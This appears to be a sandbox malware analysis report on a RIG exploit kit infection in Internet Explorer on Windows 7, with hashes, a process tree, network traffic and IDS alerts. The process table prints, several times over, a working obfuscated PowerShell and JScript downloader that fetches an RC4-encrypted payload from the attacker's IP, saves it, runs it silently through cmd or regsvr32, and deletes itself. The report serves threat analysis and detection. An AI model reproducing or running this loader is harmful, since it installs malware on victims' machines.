URL: | http://95.216.179.33/?NDc2MDky&AmJuFYcoQ&DIvw=diet&ghAPUtoHI=community&kLpoiSqmc=from&HrX=from&wDc=train&doHbz=diet&vdVgTICOv=diet&MimIm=community&CjJGINTz=velo&PpblYGHe=pinny&zem=velo&gOET=why&shufflet4=yGF-A96Ykf-BTPwHk2UDUeFczmY0OBlxHofv7jkLSy0Wdg8XTzRS9UU4HupE&obyvan4=zn_QMvXcJwDQC4HIJOXAT6FbNkzSFViOwJH_762yCc3xOWPPk7DPRAOzrh3&reatDMjY2MTQ0 |
Full analysis: | https://app.any.run/tasks/d34a617c-c200-46b4-9f1f-5a221a270549 |
Verdict: | Malicious activity |
Analysis date: | November 30, 2020, 01:21:22 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MD5: | 26F91CCAD3E88F1AF86E0D15905A559A |
SHA1: | C04D82E1D6075B98B06779771F80FCCCA95BAF15 |
SHA256: | 15C64969551FDD839E5E2C86E9B8D57400EF2E2B4E897D55EC5B32155BDB662C |
SSDEEP: | 6:CwoHHvzS8Kq5M8G0NV7411IbMxSpWut8ghoLjQh7ky7tGfmeDOee16SbuAj3jF0X:UvzIq5hG8mK1pWuroLje7tDE/cJ0X |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2576 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://95.216.179.33/?NDc2MDky&AmJuFYcoQ&DIvw=diet&ghAPUtoHI=community&kLpoiSqmc=from&HrX=from&wDc=train&doHbz=diet&vdVgTICOv=diet&MimIm=community&CjJGINTz=velo&PpblYGHe=pinny&zem=velo&gOET=why&shufflet4=yGF-A96Ykf-BTPwHk2UDUeFczmY0OBlxHofv7jkLSy0Wdg8XTzRS9UU4HupE&obyvan4=zn_QMvXcJwDQC4HIJOXAT6FbNkzSFViOwJH_762yCc3xOWPPk7DPRAOzrh3&reatDMjY2MTQ0" | C:\Program Files\Internet Explorer\iexplore.exe | | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2328 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2576 CREDAT:267521 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION) Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
2912 | ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hZytEL5Ng http://95.216.179.33/?NTE5MzY2^&cMrEia^&tdZLJXsS=community^&lzEL=one^&njqbfv=community^&PCW=velo^&KIbhGkC=from^&obyvan4=zn3QMvXcJwDQC4PIJOXAT6FbNk7SFViOwJH_76yyCc3xOWPPk7DPRAOzrh3yGF^&TcxCAG=train^&vJfq=train^&shufflet4=6A96Ykf-BTPwHk2UDUeFczmYwOBlxHofv7jkLSy0Wdg8XTzRSLZQtMz8_VF7IL^&yRRn=cars^&Pdd=cars^&ohTu=shuffle^&ZaF=twix^&EEvqGRxtN=twix^&dAmPCMTkwNjMx "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))" | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2264 | "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tmp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hZytEL5Ng http://95.216.179.33/?NTE5MzY2^&cMrEia^&tdZLJXsS=community^&lzEL=one^&njqbfv=community^&PCW=velo^&KIbhGkC=from^&obyvan4=zn3QMvXcJwDQC4PIJOXAT6FbNk7SFViOwJH_76yyCc3xOWPPk7DPRAOzrh3yGF^&TcxCAG=train^&vJfq=train^&shufflet4=6A96Ykf-BTPwHk2UDUeFczmYwOBlxHofv7jkLSy0Wdg8XTzRSLZQtMz8_VF7IL^&yRRn=cars^&Pdd=cars^&ohTu=shuffle^&ZaF=twix^&EEvqGRxtN=twix^&dAmPCMTkwNjMx 1 | C:\Windows\system32\cmd.exe | — | PowerShell.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3308 | wsCripT //B //E:JScript 3.tMp hZytEL5Ng http://95.216.179.33/?NTE5MzY2&cMrEia&tdZLJXsS=community&lzEL=one&njqbfv=community&PCW=velo&KIbhGkC=from&obyvan4=zn3QMvXcJwDQC4PIJOXAT6FbNk7SFViOwJH_76yyCc3xOWPPk7DPRAOzrh3yGF&TcxCAG=train&vJfq=train&shufflet4=6A96Ykf-BTPwHk2UDUeFczmYwOBlxHofv7jkLSy0Wdg8XTzRSLZQtMz8_VF7IL&yRRn=cars&Pdd=cars&ohTu=shuffle&ZaF=twix&EEvqGRxtN=twix&dAmPCMTkwNjMx 1 | C:\Windows\system32\wscript.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3028 | "C:\Windows\System32\cmd.exe" /c f1g4z.exe | C:\Windows\System32\cmd.exe | — | wscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2428 | "C:\Windows\system32\ntvdm.exe" | C:\Windows\system32\ntvdm.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: NTVDM.EXE Exit code: 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION) Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
444 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2576 CREDAT:202131 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION) Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
992 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2576 CREDAT:529801 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
4068 | ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hZytEL5Ng http://95.216.179.33/?NTE2MDE0^&DIMYTCBN^&tOT=why^&gQOmKm=ball^&JvEYjvHy=train^&qlr=cars^&deTjblyai=diet^&aESmmWheC=cars^&EFeLYced=community^&shFSttbz=twix^&shufflet4=-NSaArj3xeDeQdkyIsJUVlBpayv3RXTnRfK0sKC_hKPMgtH_MDEJLA60FzyzIFJMMgk9w^&obyvan4=wn3QMvXcLhXQFYPBJPPcTKZEM1HRH0SD2YubnLG3YpzNZGX_0vHDfF_wrwrcCl6JtcN_L^&Tua=diet^&Yxozw=from^&PLBDlL=ball^&nVMMGKgf=ball^&RdSXpUKODgxNTM= "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))" | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2576 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3372 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\Low\scs668C.tmp | — | |
MD5:— | SHA256:— | |||
3372 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\Low\scs668D.tmp | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\CabB519.tmp | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\TarB51A.tmp | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verB52B.tmp | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\QL7C3T9Q.txt | — | |
MD5:— | SHA256:— | |||
2576 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\32TU82N5.txt | — | |
MD5:— | SHA256:— | |||
3308 | wscript.exe | C:\Users\admin\AppData\Local\Temp\Low\f1g4z.exe | text | |
MD5:F2E219005E1E3A514609B29F093EE843 | SHA256:C02AADB7A00CC108CD492EF045216D843924FA4650C5ADBDB85247CF5E168EDB | |||
2576 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203 | der | |
MD5:17D72CAC63A6AA13767D49E497CEF56D | SHA256:9AF98609603322E425EDC8C739185D02A010309E33646F6664A26A38E31F3015 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3344 | WerFault.exe | GET | — | 104.42.151.234:80 | http://watson.microsoft.com/StageOne/ntvdm_exe/6_1_7600_16385/4a5bc158/StackHash_2264/0_0_0_0/00000000/c0000005/0000ffff.htm?LCID=1033&OS=6.1.7601.2.00010100.1.0.48.17514&SM=DELL&SPN=DELL&BV=DELL&MID=3ADE2C42-4AB9-49B7-B142-BE9AEEA69063 | US | — | — | whitelisted |
2576 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
444 | iexplore.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/?NDc2MDky&AmJuFYcoQ&DIvw=diet&ghAPUtoHI=community&kLpoiSqmc=from&HrX=from&wDc=train&doHbz=diet&vdVgTICOv=diet&MimIm=community&CjJGINTz=velo&PpblYGHe=pinny&zem=velo&gOET=why&shufflet4=yGF-A96Ykf-BTPwHk2UDUeFczmY0OBlxHofv7jkLSy0Wdg8XTzRS9UU4HupE&obyvan4=zn_QMvXcJwDQC4HIJOXAT6FbNkzSFViOwJH_762yCc3xOWPPk7DPRAOzrh3&reatDMjY2MTQ0 | DE | html | 69.2 Kb | malicious |
2576 | iexplore.exe | GET | 200 | 13.107.21.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
2576 | iexplore.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/favicon.ico | DE | — | — | malicious |
2328 | iexplore.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/?NDc2MDky&AmJuFYcoQ&DIvw=diet&ghAPUtoHI=community&kLpoiSqmc=from&HrX=from&wDc=train&doHbz=diet&vdVgTICOv=diet&MimIm=community&CjJGINTz=velo&PpblYGHe=pinny&zem=velo&gOET=why&shufflet4=yGF-A96Ykf-BTPwHk2UDUeFczmY0OBlxHofv7jkLSy0Wdg8XTzRS9UU4HupE&obyvan4=zn_QMvXcJwDQC4HIJOXAT6FbNkzSFViOwJH_762yCc3xOWPPk7DPRAOzrh3&reatDMjY2MTQ0 | DE | html | 68.8 Kb | malicious |
2576 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
3308 | wscript.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/?NTE5MzY2&cMrEia&tdZLJXsS=community&lzEL=one&njqbfv=community&PCW=velo&KIbhGkC=from&obyvan4=zn3QMvXcJwDQC4PIJOXAT6FbNk7SFViOwJH_76yyCc3xOWPPk7DPRAOzrh3yGF&TcxCAG=train&vJfq=train&shufflet4=6A96Ykf-BTPwHk2UDUeFczmYwOBlxHofv7jkLSy0Wdg8XTzRSLZQtMz8_VF7IL&yRRn=cars&Pdd=cars&ohTu=shuffle&ZaF=twix&EEvqGRxtN=twix&dAmPCMTkwNjMx | DE | text | 8 b | malicious |
2548 | wscript.exe | GET | 200 | 95.216.179.33:80 | http://95.216.179.33/?NTE2MDE0&DIMYTCBN&tOT=why&gQOmKm=ball&JvEYjvHy=train&qlr=cars&deTjblyai=diet&aESmmWheC=cars&EFeLYced=community&shFSttbz=twix&shufflet4=-NSaArj3xeDeQdkyIsJUVlBpayv3RXTnRfK0sKC_hKPMgtH_MDEJLA60FzyzIFJMMgk9w&obyvan4=wn3QMvXcLhXQFYPBJPPcTKZEM1HRH0SD2YubnLG3YpzNZGX_0vHDfF_wrwrcCl6JtcN_L&Tua=diet&Yxozw=from&PLBDlL=ball&nVMMGKgf=ball&RdSXpUKODgxNTM= | DE | text | 8 b | malicious |
2576 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2576 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
444 | iexplore.exe | 95.216.179.33:80 | — | Hetzner Online GmbH | DE | malicious |
3308 | wscript.exe | 95.216.179.33:80 | — | Hetzner Online GmbH | DE | malicious |
3344 | WerFault.exe | 104.42.151.234:80 | watson.microsoft.com | Microsoft Corporation | US | suspicious |
2328 | iexplore.exe | 95.216.179.33:80 | — | Hetzner Online GmbH | DE | malicious |
— | — | 95.216.179.33:80 | — | Hetzner Online GmbH | DE | malicious |
2576 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2576 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
— | — | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2576 | iexplore.exe | 104.18.24.243:80 | ocsp.msocsp.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
www.bing.com | | whitelisted |
api.bing.com | | whitelisted |
watson.microsoft.com | | whitelisted |
iecvlist.microsoft.com | | whitelisted |
r20swj13mr.microsoft.com | | whitelisted |
ocsp.digicert.com | | whitelisted |
ocsp.msocsp.com | | whitelisted |
ieonline.microsoft.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2328 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
2328 | iexplore.exe | A Network Trojan was detected | MALWARE [PTsecurity] RIG-EK Landing Page |
3308 | wscript.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3344 | WerFault.exe | Potential Corporate Privacy Violation | ET POLICY Application Crash Report Sent to Microsoft |
3344 | WerFault.exe | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |
444 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
444 | iexplore.exe | A Network Trojan was detected | MALWARE [PTsecurity] RIG-EK Landing Page |
1976 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |